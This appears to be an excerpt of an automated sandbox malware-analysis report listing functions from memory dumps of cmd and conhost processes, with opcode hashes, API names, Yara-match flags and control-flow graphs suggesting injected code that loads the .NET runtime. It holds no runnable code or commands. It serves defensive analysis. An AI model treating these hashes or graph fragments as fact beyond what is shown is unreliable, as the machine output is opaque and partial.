                                                                                                                                                          • Opcode ID: 8b75e76dd9e1edfe3a5ac6d5e698f8d958b02ec86f68f4ff9e8988ee6344ecaf
                                                                                                                                                          • Instruction ID: b9556738cce9c787cc6db7de296aa65891a580e9779237ff566ece358cdc6f3f
                                                                                                                                                          • Opcode Fuzzy Hash: 8b75e76dd9e1edfe3a5ac6d5e698f8d958b02ec86f68f4ff9e8988ee6344ecaf
                                                                                                                                                          • Instruction Fuzzy Hash: CAA00126928C0291E6048F02A8604302328AB61302B418433C0CD814649E2DA484EA20

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000025EE91B2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 6c5898f889e1c91179dcb89bbe9604aa30f9c1e0912670fbe7da45abfbb3a3e6
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: AD912572B12A50C7DF688F25DC0976D73D6FB24BA6F4781249E4A87788FA34D922C704

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0000025EE91C2AF0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                                                                                                                          • Instruction ID: 419517c6bf02fb232dc09cf71a05741e8d89ff23997ec7a3eb6957f78d07ead1
                                                                                                                                                          • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                                                                                                                          • Instruction Fuzzy Hash: 641156B1A38BD087FB5D9F299C5B31937D0A354396F478429D489C7A94C73DC6904F48
                                                                                                                                                          Function 0000025EE91B962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: f28fc687896d4139d30c8c897761bb3e552ef1ba97f32469433e587c37b06b9e
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 04D18F32A20B40C6EF68DF65DC8A39D37E1F765BA9F120105EA8997B95FB34C681C704
                                                                                                                                                          Function 0000025EE91B7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: c921c9aba2334a6d0092e7f07059beb14aec36786fd0548b4771fea109da4331
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 3381C321F34F40C6FE5CAB659C4B35922D3ABB67A2F4740159909C7BD6FA38CB458708
                                                                                                                                                          Function 0000025EE91B9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 5e4fdaf1e17cf85aef7fb460c53afaec577b73d5d5f87f643fadb939f87bb33d
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: E0519F32920B40C6EF688F119D4D3587BE2E364BAAF174115DB89C7B81F738CA51C709
                                                                                                                                                          Function 0000025EE91B80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: edd22457178831f364d98d4a18c339cde365896e110aaafec55a10c8becf8b25
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 14517031A22F00CADF58DB15DC497AC33D2E764FA9F1745A5AA4687788F778CA41C704
                                                                                                                                                          Function 0000025EE91B9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: a90f7e981518f9cb031f847199aa60fbb296b346fe3f1cc0c6e4cd2bb0b4be4b
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: A361D232914FC4C2DB348F15E8457DAB7E1F7A4BA9F064205EB9883B95EB38C681CB04

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000001AD31C92EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 2384b4396a3186cbdf71c8729acd06fe5936fda3123d3287874cf64b57c5126a
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 1E9105F2B02A9287DF548F75E4007A9B3B1FB45B94F549124AE4B47B9CDB38D892C702

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000001AD31C9962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 49321541c4b0a1206d85933380bf082b3ab422ed2b09568f7957ac5bfeda5d9b
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 9CD15AB2605B8686EF609B75A4813EDA7B0FB56788F100115EA8A57F9ADF38C0D1C743
                                                                                                                                                          Function 000001AD31C97050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: a83b71479b3f8ba6ccd5be5cf8e2e2b019b77fddb09fe14a9d797b0eadf1cce0
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 47817CF0713F4386FE959B75B8413D9A6B1BF87B80F084015B90B47F9ADA28C8D58A03
                                                                                                                                                          Function 000001AD31C99EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: d64669ea28e803b97661f3d8c0dbdc000cf0698035ceb897a441a2758f92d6f4
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: F2515CB2306B828AEF648B25A14439CF7B0FB56B94F146115EA8B47F99CB39C491C703
                                                                                                                                                          Function 000001AD31C980A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: ab34f1130aba08431ab4ff6c6e73a4b1738c0bea14b3e58355f4f9cf8cc305b0
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 87519EB2312F068ADF54CB75F444BA8B3A1FB46B98F554125AA4B47B88D779C881C702
                                                                                                                                                          Function 000001AD31C99AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: ae7da703fcc8dad5278790a0e428d92c879d58410f85495a80844ec063fde9d5
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 8B616CB2605BC581EF719B25F4407DAF7A0FB86B88F044215EB9A07B99DB78D1D0CB02

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10.3%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:21
                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                          execution_graph 2537 113db11e106 2538 113db11e128 2537->2538 2539 113db11e254 LoadLibraryA 2538->2539 2540 113db11e269 2538->2540 2548 113db11e17c 2538->2548 2539->2538 2547 113db11e31d 2540->2547 2540->2548 2556 113db11d2a2 2540->2556 2542 113db11e2f3 2543 113db11e2f7 2542->2543 2549 113db11d3ba LoadLibraryA 2542->2549 2543->2542 2543->2548 2546 113db11e30c 2546->2547 2546->2548 2547->2548 2551 113db11deb2 2547->2551 2550 113db11d3df 2549->2550 2550->2546 2552 113db11def2 CLRCreateInstance 2551->2552 2554 113db11df0b 2551->2554 2552->2554 2553 113db11e0b2 2553->2548 2554->2553 2554->2554 2555 113db11e0a9 SafeArrayDestroy 2554->2555 2555->2553 2557 113db11d2af LoadLibraryA 2556->2557 2558 113db11d2c7 2557->2558 2558->2542 2559 113db11d2af LoadLibraryA 2560 113db11d2c7 2559->2560

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00000113DB11E106 Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 123 113db11e106-113db11e157 call 113db11f2de * 3 130 113db11e189 123->130 131 113db11e159-113db11e15c 123->131 132 113db11e18c-113db11e19d 130->132 131->130 133 113db11e15e-113db11e161 131->133 133->130 134 113db11e163-113db11e17a 133->134 136 113db11e19e-113db11e1c9 call 113db11f85e call 113db11f87e 134->136 137 113db11e17c-113db11e183 134->137 143 113db11e206-113db11e21d call 113db11f2de 136->143 144 113db11e1cb-113db11e200 call 113db11f492 call 113db11f352 136->144 137->130 138 113db11e185 137->138 138->130 143->130 149 113db11e223-113db11e224 143->149 144->143 153 113db11e462-113db11e473 144->153 152 113db11e22a-113db11e230 149->152 154 113db11e269-113db11e273 152->154 155 113db11e232 152->155 156 113db11e475-113db11e47f 153->156 157 113db11e4a6-113db11e4c7 call 113db11f87e 153->157 159 113db11e275-113db11e290 call 113db11f2de 154->159 160 113db11e2a1-113db11e2aa 154->160 158 113db11e234-113db11e236 155->158 156->157 163 113db11e481-113db11e49f call 113db11f87e 156->163 184 113db11e4c9 157->184 185 113db11e4cd-113db11e4cf 157->185 164 113db11e238-113db11e23e 158->164 165 113db11e250-113db11e252 158->165 159->153 175 113db11e296-113db11e29f 159->175 161 113db11e2c5-113db11e2c8 160->161 162 113db11e2ac-113db11e2b6 call 113db11d4d2 160->162 161->153 169 113db11e2ce-113db11e2d8 161->169 162->153 180 113db11e2bc-113db11e2c3 162->180 163->157 164->165 171 113db11e240-113db11e24e 164->171 165->154 172 113db11e254-113db11e267 LoadLibraryA 165->172 177 113db11e2da-113db11e2db 169->177 178 113db11e2e2-113db11e2e9 169->178 171->158 171->165 172->152 175->159 175->160 177->178 181 113db11e31d-113db11e321 178->181 182 113db11e2eb-113db11e2ec 178->182 180->178 186 113db11e327-113db11e349 181->186 187 113db11e3fd-113db11e405 181->187 189 113db11e2ee call 113db11d2a2 182->189 184->185 185->132 186->153 199 113db11e34f-113db11e369 call 113db11f85e 186->199 190 113db11e457-113db11e45d call 113db11e90e 187->190 191 113db11e407-113db11e40d 187->191 192 113db11e2f3-113db11e2f5 189->192 190->153 195 113db11e424-113db11e436 call 113db11deb2 191->195 196 113db11e40f-113db11e415 191->196 197 113db11e304-113db11e307 call 113db11d3ba 192->197 198 113db11e2f7-113db11e2fe 192->198 210 113db11e448-113db11e455 call 113db11d952 195->210 211 113db11e438-113db11e443 call 113db11e4d6 195->211 196->153 200 113db11e417-113db11e422 call 113db11ed6a 196->200 203 113db11e30c-113db11e30e 197->203 198->153 198->197 213 113db11e389-113db11e3b2 199->213 214 113db11e36b-113db11e36e 199->214 200->153 203->181 207 113db11e310-113db11e317 203->207 207->153 207->181 210->153 211->210 213->153 220 113db11e3b8-113db11e3f8 213->220 214->187 217 113db11e374-113db11e387 call 113db11f5e2 214->217 222 113db11e3fa-113db11e3fb 217->222 220->153 220->222 222->187
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction ID: 9c00539e9249260716eba31fc00eef61109c650f191e800916ef56cf1fe1a7fa
                                                                                                                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction Fuzzy Hash: DAC1FB31714D059BEF5CEAB8D4D57F9B3D1FB9A340FD40129D56AC318EDB20EA0A8A81
                                                                                                                                                          Function 00007FF7C14D50F6 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 365 7ff7c14d50f6-7ff7c14d5103 366 7ff7c14d5105-7ff7c14d510d 365->366 367 7ff7c14d510e-7ff7c14d51d7 365->367 366->367 371 7ff7c14d5243 367->371 372 7ff7c14d51d9-7ff7c14d51e2 367->372 374 7ff7c14d5245-7ff7c14d526a 371->374 372->371 373 7ff7c14d51e4-7ff7c14d51f0 372->373 375 7ff7c14d51f2-7ff7c14d5204 373->375 376 7ff7c14d5229-7ff7c14d5241 373->376 381 7ff7c14d52d6 374->381 382 7ff7c14d526c-7ff7c14d5275 374->382 377 7ff7c14d5206 375->377 378 7ff7c14d5208-7ff7c14d521b 375->378 376->374 377->378 378->378 380 7ff7c14d521d-7ff7c14d5225 378->380 380->376 383 7ff7c14d52d8-7ff7c14d5380 381->383 382->381 384 7ff7c14d5277-7ff7c14d5283 382->384 395 7ff7c14d5382-7ff7c14d538c 383->395 396 7ff7c14d53ee 383->396 385 7ff7c14d5285-7ff7c14d5297 384->385 386 7ff7c14d52bc-7ff7c14d52d4 384->386 388 7ff7c14d529b-7ff7c14d52ae 385->388 389 7ff7c14d5299 385->389 386->383 388->388 391 7ff7c14d52b0-7ff7c14d52b8 388->391 389->388 391->386 395->396 398 7ff7c14d538e-7ff7c14d539b 395->398 397 7ff7c14d53f0-7ff7c14d5419 396->397 405 7ff7c14d5483 397->405 406 7ff7c14d541b-7ff7c14d5426 397->406 399 7ff7c14d53d4-7ff7c14d53ec 398->399 400 7ff7c14d539d-7ff7c14d53af 398->400 399->397 402 7ff7c14d53b3-7ff7c14d53c6 400->402 403 7ff7c14d53b1 400->403 402->402 404 7ff7c14d53c8-7ff7c14d53d0 402->404 403->402 404->399 408 7ff7c14d5485-7ff7c14d5516 405->408 406->405 407 7ff7c14d5428-7ff7c14d5436 406->407 409 7ff7c14d546f-7ff7c14d5481 407->409 410 7ff7c14d5438-7ff7c14d544a 407->410 416 7ff7c14d551c-7ff7c14d552b 408->416 409->408 412 7ff7c14d544c 410->412 413 7ff7c14d544e-7ff7c14d5461 410->413 412->413 413->413 414 7ff7c14d5463-7ff7c14d546b 413->414 414->409 417 7ff7c14d5533-7ff7c14d5598 call 7ff7c14d55b4 416->417 418 7ff7c14d552d 416->418 425 7ff7c14d559f-7ff7c14d55b3 417->425 426 7ff7c14d559a 417->426 418->417 426->425
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fec1939adbecdef4d02354f4b30f75f0cce8a73c49ab4cf8ccd6d9ddafe3637b
                                                                                                                                                          • Instruction ID: 12e8897e41489217f74c9d5f2ecb505bd957de18c524055f313e0387c790be09
                                                                                                                                                          • Opcode Fuzzy Hash: fec1939adbecdef4d02354f4b30f75f0cce8a73c49ab4cf8ccd6d9ddafe3637b
                                                                                                                                                          • Instruction Fuzzy Hash: E5F18230908A8D8FEFA8EF28C8557E977E1FF54311F44427AE84DC7295CE74A9458B82
                                                                                                                                                          Function 00007FF7C14D5EA2 Relevance: .5, Instructions: 460COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 427 7ff7c14d5ea2-7ff7c14d5eaf 428 7ff7c14d5eb1-7ff7c14d5eb9 427->428 429 7ff7c14d5eba-7ff7c14d5f87 427->429 428->429 433 7ff7c14d5ff3 429->433 434 7ff7c14d5f89-7ff7c14d5f92 429->434 435 7ff7c14d5ff5-7ff7c14d601a 433->435 434->433 436 7ff7c14d5f94-7ff7c14d5fa0 434->436 443 7ff7c14d6086 435->443 444 7ff7c14d601c-7ff7c14d6025 435->444 437 7ff7c14d5fa2-7ff7c14d5fb4 436->437 438 7ff7c14d5fd9-7ff7c14d5ff1 436->438 440 7ff7c14d5fb6 437->440 441 7ff7c14d5fb8-7ff7c14d5fcb 437->441 438->435 440->441 441->441 442 7ff7c14d5fcd-7ff7c14d5fd5 441->442 442->438 446 7ff7c14d6088-7ff7c14d60ad 443->446 444->443 445 7ff7c14d6027-7ff7c14d6033 444->445 447 7ff7c14d6035-7ff7c14d6047 445->447 448 7ff7c14d606c-7ff7c14d6084 445->448 452 7ff7c14d60af-7ff7c14d60b9 446->452 453 7ff7c14d611b 446->453 450 7ff7c14d604b-7ff7c14d605e 447->450 451 7ff7c14d6049 447->451 448->446 450->450 454 7ff7c14d6060-7ff7c14d6068 450->454 451->450 452->453 455 7ff7c14d60bb-7ff7c14d60c8 452->455 456 7ff7c14d611d-7ff7c14d614b 453->456 454->448 457 7ff7c14d6101-7ff7c14d6119 455->457 458 7ff7c14d60ca-7ff7c14d60dc 455->458 463 7ff7c14d61bb 456->463 464 7ff7c14d614d-7ff7c14d6158 456->464 457->456 459 7ff7c14d60e0-7ff7c14d60f3 458->459 460 7ff7c14d60de 458->460 459->459 462 7ff7c14d60f5-7ff7c14d60fd 459->462 460->459 462->457 465 7ff7c14d61bd-7ff7c14d6295 463->465 464->463 466 7ff7c14d615a-7ff7c14d6168 464->466 476 7ff7c14d629b-7ff7c14d62aa 465->476 467 7ff7c14d61a1-7ff7c14d61b9 466->467 468 7ff7c14d616a-7ff7c14d617c 466->468 467->465 470 7ff7c14d6180-7ff7c14d6193 468->470 471 7ff7c14d617e 468->471 470->470 472 7ff7c14d6195-7ff7c14d619d 470->472 471->470 472->467 477 7ff7c14d62b2-7ff7c14d6314 call 7ff7c14d6330 476->477 478 7ff7c14d62ac 476->478 485 7ff7c14d6316 477->485 486 7ff7c14d631b-7ff7c14d632f 477->486 478->477 485->486
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3858bdd14f4e86fcebb238384309ec45571ddd1dc020c8d37960f120391ff5c3
                                                                                                                                                          • Instruction ID: 57354ca99c60bffc4866089cfbc3de809ece112ee1471e8abbacb803f90d8270
